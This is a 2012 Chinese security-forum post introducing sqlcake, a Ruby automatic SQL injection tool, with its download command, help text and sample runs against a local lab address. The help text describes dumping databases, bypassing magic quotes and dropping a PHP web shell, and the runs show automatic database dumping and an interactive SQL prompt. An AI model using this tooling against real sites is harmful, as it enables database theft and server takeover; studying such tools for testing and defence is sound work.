切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
359 sqlcake[复制链接]
发表于 2012-11-21 00:16:21 | 显示全部楼层 |!read_mode!

和SQLMAP一样 官方介绍是:

Automatic SQL injection and database information gathering tool.

和SQLMAP一模一样的介绍
RUBY语言

  1. root@Dis9Team:/pen/sql# wget http://sourceforge.net/projects/sqlcake/files/sqlcake-v1.1.tar/download
  2. root@Dis9Team:/pen/sql# tar xf download.1
复制代码
查看帮助:


  1. root@Dis9Team:/pen/sql# ruby sqlcake.rb


  2.        _________________________________
  3.       /                                 \
  4.            sql auto exploitation kit
  5.       \_________________________________/

  6.              version: v1.1b (beta)


  7. sqlcake _ sql auto exploitation kit _ v1.1b
  8. written by impuls <impuls23@safe-mail.net>

  9. automatic dump database & interactive sql shell tool
  10. dumps the current database structure including
  11. tables and columns and turns into an interactive
  12. mysql prompt. mysql specific special commands are:

  13. hex:[str]       => to hex a string for magic quotes bypassing, e.g. hex:hello
  14. dropshell:[str] => drops a php shell (param x) (magic quotes must be deactivated),
  15.                 => e.g. dropshell:/var/www/exec.php | /exec.php?x=ps
  16. dump:[str]      => to dump a specific table, e.g. dump:mysql.users
  17. blind:[on/off]  => toggle blind sql injection mode

  18. parameter setup:

  19. -u => set target URI ["http://www.example.com/x.php?id=2&cat=5"]
  20. -p => set target parameter ["id"]
  21. -e => set error string for union selecion ["_fetch"]
  22. -d => set error escape string [" /*"]
  23. -b => use blind sql injection mode
  24. -f => write data to output file
  25. -x => skip database dump

  26. root@Dis9Team:/pen/sql#
复制代码

FUZZ:


  1. root@Dis9Team:/pen/sql# ruby sqlcake.rb -u http://192.168.1.103/pen/news.php?id=1 -p id
复制代码

他会自动列变脱裤



保存数据


  1. root@Dis9Team:/pen/sql# ruby sqlcake.rb -u http://192.168.1.103/pen/news.php?id=1 -p id -f
  2. [*] Writing data to sqlcake_2012-11-11-101602.txt
复制代码

blind sql
参数-b 太慢模拟MYSQL

  1. root@Dis9Team:/pen/sql# ruby sqlcake.rb -u http://192.168.1.103/pen/news.php?id=1 -p id -x


  2.        _________________________________
  3.       /                                 \
  4.            sql auto exploitation kit
  5.       \_________________________________/

  6.              version: v1.1b (beta)


  7. [*] Getting column count...
  8. [*] Target URI: http://192.168.1.103/pen/news.php?id=1
  9. [*] Searching identifier...
  10. [*] Can't find identifier (_assoc)
  11. [*] Using blind SQL injection mode

  12. mysql>
复制代码




附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-20 20:12

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部